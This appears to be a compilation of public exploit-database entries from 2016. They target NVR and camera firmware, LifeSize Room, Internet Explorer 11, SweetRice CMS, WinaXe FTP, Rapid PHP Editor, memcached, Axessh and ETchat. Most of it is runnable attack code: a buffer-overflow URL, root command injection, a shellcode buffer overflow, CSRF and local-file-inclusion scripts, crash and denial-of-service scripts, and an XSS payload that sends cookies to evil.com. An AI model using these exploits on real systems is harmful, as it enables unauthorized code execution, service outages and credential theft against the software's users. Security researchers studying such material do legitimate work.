Symbols (1072): -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# For NVR:
Version firmware:
1.6.0902.0000.3.0.29.0.0
1.6.0802.0000.0.0.2906.1.0
Use link: http://IP/cgi-bin/videoStream.cgi?userName=
# For Cams:
Version firmware:
2.0.0601.1002.3.0.56.0.1_TD
2.0.0801.1002.1.1.125.0.0
2.0.0601.1002.3.0.33.0.12
Use link: http://IP/cgi-bin/image.cgi?userName=
# Eg: http://IP/cgi-bin/image.cgi?userName=-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ЯR qwsj 2016
Source: https://github.com/XiphosResearch/exploits/tree/master/deathsize
LifeSize Room 5.0.9, remote config disclosure, code execution & local privilege escalation
Ultimately the Lifesize Room products have fundamentally flawed firmware, many similar very bugs in the WebUI exist and thier support team have been recommending that port 443 isn't accessible via the internet.
They've been alerted to several very similar bugs, and in some cases have fixed one gaping security hole only to leave another one literally 10 lines above completely untouched. facepalm
What makes this different? This exploit will run your payload as root.
Description
This exploit uses the LsSystemRestore.sh script to disclose the current configuration, that is then leveraged to gain access to exploitable APIs in the admin portal which allow arbitrary command injection, then uses a local privilege escalation bug to execute the payload as root.
This will work as long as port 443 is open on the phone, Lifesize support should recommend that the power and ethernet cables are disconnected from the device to ensure it remains secure.
LsSystemRestore.sh allows autosh commands to be executed without any authentication, this is used to grab the Admin password via the get config -P command.
Using the Admin password AMF commands can be sent to the LSRoom_Remoting endpoint, this contains a method called doPrefCommand which is vulnerable to command injection.
function doPrefCommand($cmd, $id){
// Look for the existence of a "pref " and ";" needle.
$invalidCmd = $this->scrubPrefString($cmd);
if ( $invalidCmd )
{
return "invalid_command";
}
// If we get to here, we want to double check the command for
// any unwanted characters: #&;`|*?~<>^()[]{}$\, \x0A and \xFF. ' and "
//$cleanCommand = escapeshellcmd($cmd);
$prefData = array();
$value = rtrim(shell_exec($cmd));
What's interesting here is that the escapeshellcmd function is commented out, this would have prevented the command injection, but all of the code on the firmware smells of barely competent development and least-effort attempts to patch security vulnerabilities.
Local privilege escalation to root is gained by executing the setuid tcpdump_manager executable, which runs a program called reset_tcpdump using PATH to resolve its location using PATH=/tmp:$PATH tcpdump_manager
Other exploits exist in the 'support' portal, providing command execution, for example in support/download_file.php:
<html>
<head>
<?php
print('
</head>
<body>
<h1>Download File </h1>
');
$file_to_download=$_REQUEST['file_to_download'];
{
print("<hr>\n");
shell_exec("rm tmp/tmp-file.tmp");
shell_exec("cp $file_to_download tmp/tmp-file.tmp");
Usage
$ deathsize.php 192.168.40.39 payload
[*] Retrieving admin password
[*] Saving config for 192.168.40.39
[*] Admin password is: 1234
[*] Authenticating for AMF RPC
[*] Sending command: ...
...
This will save the configuration for the device into the local file 192.168.40.39.config and then execute the code in your payload file as root on the device and print out the response.
Timeline
13th June 2016 - Notified LifeSize of multiple vulnerabilities
15th June - LifeSize start spamming my inbox with marketing messages
16th June - Requested escallation, support requested demo
22nd June - Telling LifeSize that no... just changing the password doesn't fix it
30th June - Test device provided by support
1st July - Owned their test device running latest firmware
4th July - Support can't reproduce or understand exploit
5th July - Engineering ticket created
7th July - Support recommend adding firewall, sigh
8th August - Provide PoC
Have had no further contact with them, unable to get a CVE assigned for this, product will be EOL in January 2017, seems like there's no firmware update coming...
Full Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40690.zip
<!--
Source: http://blog.skylined.nl/20161102001.html
Synopsis
Setting the listStyleImage property of an Element object causes Microsoft Internet Explorer 11 to allocate 0x4C bytes for an "image context" structure, which contains a reference to the document object as well as a reference to the same CMarkup object as the document. When the element is removed from the document (-fragment), this image context is freed on the next "draw". However, the code continues to use the freed context almost immediately after it is freed.
Known affected versions, attack vectors and mitigations
Microsoft Internet Explorer 11
An attacker would need to get a target user to open a specially crafted webpage. As far as can be determined, disabling JavaScript should prevent an attacker from triggering the vulnerable code path.
-->
<script>
var oDocumentFragment = document.createDocumentFragment(),
oElement = document.createElement('x');
oDocumentFragment.appendChild(oElement);
oElement.style.listStyleImage = "url(x)";
oDocumentFragment.removeChild(oElement);
</script>
<!--
Exploit
I tried a few tricks to see if there was an easy way to reallocate the freed memory before the reuse, but was unable to find anything. I do not know if there is a way to cause further reuse of the freed memory later on in the code. Running the repro as-is without page heap does not appear to trigger crashes. It does not appear that there is enough time between the free and reuse to exploit this issue.
Timeline
May 2014: This vulnerability was found through fuzzing.
June 2014: This vulnerability was submitted to ZDI.
July 2014: ZDI rejects the submission.
November 2016: The issue does not reproduce in the latest build of MSIE 11.
November 2016: Details of this issue are released.
Unfortunately, my records of what happened after ZDI rejected the issue are patchy. It appears that I did not pursue reporting the issue anywhere else, but Microsoft does appear to have patched the issue, as I can no longer reproduce it.
-->
<!--
# Exploit Title: SweetRice 1.5.1 - Cross-Site Request Forgery
# Exploit Author: Ashiyane Digital Security Team
# Date: 03-11-2016
# Vendor: http://www.basic-cms.org/
# Software Link: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
# Version: 1.5.1
# Platform: WebApp - PHP - Mysql
# Exploit 1:
-->
<html>
<!-- CSRF PoC -->
<body>
<form action="http://localhost/as/?type=data&mode=sql_execute&form_mode=yes" method="POST">
<input type="hidden" name='sql_content' value="CREATE DATABASE testfcb">
<input type="submit" value="Execute" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
<!--
Exploit 2:
Next send request a file with name 'SweetRice-transfer.zip' create in main directory and you can access to all of files in this url:
http://localhost/SweetRice-transfer.zip
-->
<html>
<!-- CSRF PoC -->
<body>
<img src='http://localhost/1/as/?type=data&mode=transfer&form_type=pack'></img>
</body>
</html>
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WINAXE-FTP-CLIENT-REMOTE-BUFFER-OVERFLOW.txt
[+] ISR: Apparition Security
Vendor:
============
www.labf.com
Product:
================
WinaXe v7.7 FTP
The X Window System, SSH, TCP/IP, NFS, FTP, TFTP and Telnet software are built and provided in the package.
All that you need to run remote UNIX and X Applications is included within WinaXe Plus. You operate simultaneously with
X11, FTP and Telnet sessions and with your familiar MS Windows applications.
Vulnerability Type:
=======================
Remote Buffer Overflow
Vulnerability Details:
======================
WinaXe v7.7 FTP client is subject to MULTIPLE remote buffer overflow vectors when connecting to a malicious FTP Server and
receiving overly long payloads in the command response from the remote server.
220 SERVICE READY
331 USER / PASS
200 TYPE
257 PWD
etc...
below is POC for "server ready" 220 command exploit when first connecting to a FTP server.
Exploit code(s):
===============
import socket,struct
#WinaXe v7.7 FTP Client 'Service Ready' Command Buffer Overflow Exploit
#Discovery hyp3rlinx
#ISR: ApparitionSec
#hyp3rlinx.altervista.org
#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")
eip=struct.pack('<L',0x68084A6F) #POP ECX RET
jmpesp=struct.pack('<L',0x68017296) #JMP ESP
#We will do POP ECX RET and place a JMP ESP address at the RET address that will jump to shellcode.
payload="A"*2061+eip+jmpesp+"\x90"*10+sc+"\x90"*20 #Server Ready '220' Exploit
port = 21
s = socket.socket()
host = '127.0.0.1'
s.bind((host, port))
s.listen(5)
print 'Evil FTPServer listening...'
while True:
conn, addr = s.accept()
conn.send('220'+payload+'\r\n')
conn.close()
Exploitation Technique:
=======================
Remote
Severity Level:
================
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/RAPID-PHP-EDITOR-REMOTE-CMD-EXEC.txt
[+] ISR: Apparition Security
Vendor:
======================
www.rapidphpeditor.com
Product:
===============================
Rapid PHP Editor IDE
rapidphp2016.exe v14.1
Rapid PHP editor is a faster and more powerful PHP editor for Windows combining features of a fully-packed PHP IDE with
the speed of the Notepad. Rapid PHP is the most complete all-in-one software for coding PHP, HTML, CSS, JavaScript and
other web development languages with tools for debugging, validating, reusing, navigating and formatting your code.
Vulnerability Type:
=============================
CSRF Remote Command Execution
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
There is a Remote Command Execution ailment in this IDE, if a user of this IDE is running the internal debug server
listening on localhost port 89 and they open a link or visit a malicious webpage then remote attackers can execute arbitrary
commands on the victims system.
Reference:
http://forums.blumentals.net/viewtopic.php?f=15&t=7062
Exploit code(s):
================
Call Windows "calc.exe" as POC
<a href="http://127.0.0.1:89/~C/Windows/system32/calc.exe">Click it!</a>
OR
<form action="http://127.0.0.1:89/~C/Windows/system32/calc.exe" method="post">
<script>document.forms[0].submit()</script>
</form>
Disclosure Timeline:
=============================================
Vendor notification: October 5, 2016
Vendor confirms vulnerability: October 7, 2016
Vendor releases fixed version: November 1, 2016
November 2, 2016 : Public Disclosure
Severity Level:
================
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.
# Source: http://paper.seebug.org/95/
import struct
import socket
import sys
MEMCACHED_REQUEST_MAGIC = "\x80"
OPCODE_PREPEND_Q = "\x1a"
key_len = struct.pack("!H",0xfa)
extra_len = "\x00"
data_type = "\x00"
vbucket = "\x00\x00"
body_len = struct.pack("!I",0)
opaque = struct.pack("!I",0)
CAS = struct.pack("!Q",0)
body = "A"*1024
if len(sys.argv) != 3:
print "./poc_crash.py <server> <port>"
packet = MEMCACHED_REQUEST_MAGIC + OPCODE_PREPEND_Q + key_len + extra_len
packet += data_type + vbucket + body_len + opaque + CAS
packet += body
set_packet = "set testkey 0 60 4\r\ntest\r\n"
get_packet = "get testkey\r\n"
s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s1.connect((sys.argv[1],int(sys.argv[2])))
s1.sendall(set_packet)
print s1.recv(1024)
s1.close()
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((sys.argv[1],int(sys.argv[2])))
s2.sendall(packet)
print s2.recv(1024)
s2.close()
s3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s3.connect((sys.argv[1],int(sys.argv[2])))
s3.sendall(get_packet)
s3.recv(1024)
s3.close()
# Source: http://paper.seebug.org/95/
import struct
import socket
import sys
MEMCACHED_REQUEST_MAGIC = "\x80"
OPCODE_ADD = "\x02"
key_len = struct.pack("!H",0xfa)
extra_len = "\x08"
data_type = "\x00"
vbucket = "\x00\x00"
body_len = struct.pack("!I",0xffffffd0)
opaque = struct.pack("!I",0)
CAS = struct.pack("!Q",0)
extras_flags = 0xdeadbeef
extras_expiry = struct.pack("!I",0xe10)
body = "A"*1024
packet = MEMCACHED_REQUEST_MAGIC + OPCODE_ADD + key_len + extra_len
packet += data_type + vbucket + body_len + opaque + CAS
packet += body
if len(sys.argv) != 3:
print "./poc_add.py <server> <port>"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1],int(sys.argv[2])))
s.sendall(packet)
print s.recv(1024)
s.close()
# Source: http://paper.seebug.org/95/
import struct
import socket
import sys
MEMCACHED_REQUEST_MAGIC = "\x80"
OPCODE_SET = "\x21"
key_len = struct.pack("!H",32)
body_len = struct.pack("!I",1)
packet = MEMCACHED_REQUEST_MAGIC + OPCODE_SET + key_len + body_len*2 + "A"*1000
if len(sys.argv) != 3:
print "./poc_sasl.py <server> <ip>"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1],int(sys.argv[2])))
s.sendall(packet)
print s.recv(1024)
s.close()
#/usr/bin/python
#-*- Coding: utf-8 -*-
# Exploit Title: SweetRice 1.5.1 - Local File Inclusion
# Exploit Author: Ashiyane Digital Security Team
# Date: 03-11-2016
# Vendor: http://www.basic-cms.org/
# Software Link: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
# Version: 1.5.1
# Platform: WebApp - PHP - Mysql
import requests
import os
from requests import session
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
pass
banner = '''
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
| _________ __ __________.__ |
| / _____/_ _ __ ____ _____/ |\______ \__| ____ ____ |
| \_____ \\ \/ \/ // __ \_/ __ \ __\ _/ |/ ___\/ __ \ |
| / \\ /\ ___/\ ___/| | | | \ \ \__\ ___/ |
|/_______ / \/\_/ \___ >\___ >__| |____|_ /__|\___ >___ > |
| \/ \/ \/ \/ \/ \/ |
| > SweetRice 1.5.1 Local File Inclusion |
| > Script Cod3r : Ehsan Hosseini |
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
'''
print(banner)
# Get Host & User & Pass & LfiPath
host = input("Enter The Target URL(Example : localhost.com) : ")
username = input("Enter Username : ")
password = input("Enter Password : ")
lfipath = input("Enter File To Download(Example : ../db.php) : ")
xplfile = input("Enter Name of File To Save(Example : ../db.php) : ")
userinfo = {
'user':username,
'passwd':password,
'rememberMe':''
}
with session() as r:
login = r.post('http://' + host + '/as/?type=signin', data=userinfo)
success = 'Login success'
if login.status_code == 200:
print("[+] Sending User&Pass...")
if login.text.find(success) > 1:
print("[+] Login Succssfully...")
else:
print("[-] User or Pass is incorrent...")
print("Good Bye...")
exit()
pass
pass
dlfile = r.get('http://' + host + '/as/?type=data&mode=db_import&db_file=' + lfipath + '&form_mode=save')
if dlfile.status_code == 200:
print('[+] Exploit...')
file = open(xplfile, "w")
file.write(dlfile.text)
file.close()
print('[+] File Saved...')
print('[+] Exploit By Ehsan Hosseini')
else:
print("[-] Error in Exploting...")
pass
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AXESSH-DENIAL-OF-SERVICE.txt
[+] ISR: ApparitionSec
Vendor:
============
www.labf.com
Product:
=============
Axessh 4.2.2
Axessh is a SSH client. It is a superb terminal emulator/telnet client for Windows. It provides SSH capabilities to Axessh without
sacrificing any of existing functionality. Furthermore, Axessh has been developed entirely outside of the USA, and can be sold
anywhere in the world (apart from places where people aren't allowed to own cryptographic software).
2. Axessh features include:
Compatible with SSH protocol version 2.0 (a SSH2-client based on OpenSSH 3.4)
Compatible with SSH protocol version 1.5
Ciphers(for the SSH1-client): 3DES, Blowfish, DES, RC4
Ciphers(for the SSH2-client): 3DES, Blowfish, CAST128, ARCFOUR, AES128, AES192, AES256-cbc
Authentication using password
Authentication RSA
Compression support
Connection forwarding, including full support for X-protocol connection forwarding
"Dynamic Forwarding" which provides other tasks on the same PC with requested port forwarding
Vulnerability Type:
====================
Denial Of Service
AxeSSH will crash after receiving a overly long payload of junk...
Exploit code(s):
===============
1) Open the settings window for axessh and choose Run then click Run as EXE, this will launch "xwpsshd.exe"
crashes with bad protocol version.
import socket
print "Axessh 4.2.2 XwpSSHD (wsshd.exe) Remote Denial Of Service"
ip = raw_input("[IP]> ")
port = 22
payload="A"*2000
s=socket.create_connection((ip,port))
s.send(payload)
Exploitation Technique:
=======================
Remote
Severity Level:
================
Medium
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx
<!--
# Exploit Title: SweetRice 1.5.1 Arbitrary Code Execution
# Date: 30-11-2016
# Exploit Author: Ashiyane Digital Security Team
# Vendor Homepage: http://www.basic-cms.org/
# Software Link: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
# Version: 1.5.1
# Description :
# In SweetRice CMS Panel In Adding Ads Section SweetRice Allow To Admin Add
PHP Codes In Ads File
# A CSRF Vulnerabilty In Adding Ads Section Allow To Attacker To Execute
PHP Codes On Server .
# In This Exploit I Just Added a echo '<h1> Hacked </h1>'; phpinfo();
Code You Can
Customize Exploit For Your Self .
# Exploit :
-->
<html>
<body onload="document.exploit.submit();">
<form action="http://localhost/sweetrice/as/?type=ad&mode=save" method="POST" name="exploit">
<input type="hidden" name="adk" value="hacked"/>
<textarea type="hidden" name="adv">
<?php
echo '<h1> Hacked </h1>';
phpinfo();?>
</textarea>
</form>
</body>
</html>
<!--
# After HTML File Executed You Can Access Page In
http://localhost/sweetrice/inc/ads/hacked.php
-->
# Exploit Title: ETchat(persian version) CMS Xsrf vulnerability
# Exploit Author: Hesam Bazvand
# Contact: https://www.facebook.com/hesam.king73
# Software Link: http://dl.20script.ir/script/chat/et-chat-3.7-Persian(www.20script.ir).zip
# Tested on: Windows 7 / Kali Linux
# Category: WebApps
# Dork : User Your Mind ! :D
# Email : Black.king066@gmail.com
#special thanks to my best friend Aryan Bayani Nejad
<html>
<body onload="document.frm1.submit()" >
<script>
var f = document.createElement("form");
f.setAttribute('method',"post");
f.setAttribute('name',"frm1");
f.setAttribute('action',"http://localhost/etchat/?AdminCreateNewRoom");
var i = document.createElement("input"); //input element, text
i.setAttribute('type',"text");
i.setAttribute('name',"room");
i.setAttribute('value',"<ScRiPt \>window.location.replace(\"http://evil.com\" + encodeURIComponent(document.cookie))\</ScRiPt\>");
f.appendChild(i);
//and some more input elements here
//and dont forget to add a submit button
document.getElementsByTagName('body')[0].appendChild(f);
</script>
</body>
</html>